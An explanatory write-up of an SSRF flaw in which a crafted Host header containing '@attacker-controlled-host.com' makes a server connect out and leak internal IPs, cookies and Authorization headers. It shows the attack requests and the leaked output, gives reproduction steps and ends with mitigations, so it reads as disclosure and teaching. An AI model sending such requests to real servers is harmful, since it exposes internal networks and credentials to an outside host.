SSRF Vulnerability: Internal IP Leak Explained

Server-Side Request Forgery (SSRF) is a critical web vulnerability that allows attackers to make a server send requests to internal or external hosts. This can lead to sensitive information disclosure, including internal IP addresses.

What is SSRF?

SSRF occurs when an attacker tricks the server into sending requests to unintended locations. This can expose sensitive data like internal IP addresses or allow access to services behind a firewall.

Example: An attacker may discover internal IP addresses or reach protected internal systems.

How the Exploit Works

1. Normal request to the website

GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG; googtrans=/en/zh-TW
Connection: close
Upgrade-Insecure-Requests: 1

Everything works as expected. No sensitive information is leaked.

2. Malicious request using @ in the Host header

GET / HTTP/1.1
Host: www.example.com:80@attacker-controlled-host.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

The server attempts to connect to the host after the @. This can leak internal IP addresses and other sensitive headers.

3. What the attacker sees

GET / HTTP/1.1
Host: attacker-controlled-host.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG
X-Internal-IP: 1.1.1.1
Accept-Encoding: gzip, deflate, identity
Connection: Keep-Alive
Authorization: Basic ****
X-BlueCoat-Via: 913daace1d652c00

• X-Internal-IP: Internal IP of the server.
• Authorization: Potentially sensitive credentials.
• Other headers: May reveal proxies or network details.

The attacker may also monitor DNS lookups revealing internal network structure, even government-owned networks.

Impact

Medium severity: Exposes internal IPs and sensitive server information. Enables attackers to plan further attacks inside the network.

Reproducing the Issue

GET / HTTP/1.1
Host: www.victim.com:80@yourwebsite.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

Observe the results on the attacker-controlled host (e.g., using Burp Collaborator). Analyze the HTTP response and any DNS lookups performed by the server.

Mitigation

• Reject requests connecting to unauthorized hosts.
• Do not trust the Host header provided by users.
• Validate addresses before connecting to any internal service.
• Restrict access to internal networks through web applications.

Conclusion: SSRF vulnerabilities may seem simple, but they are dangerous. They allow attackers to spy on internal servers and leak sensitive information.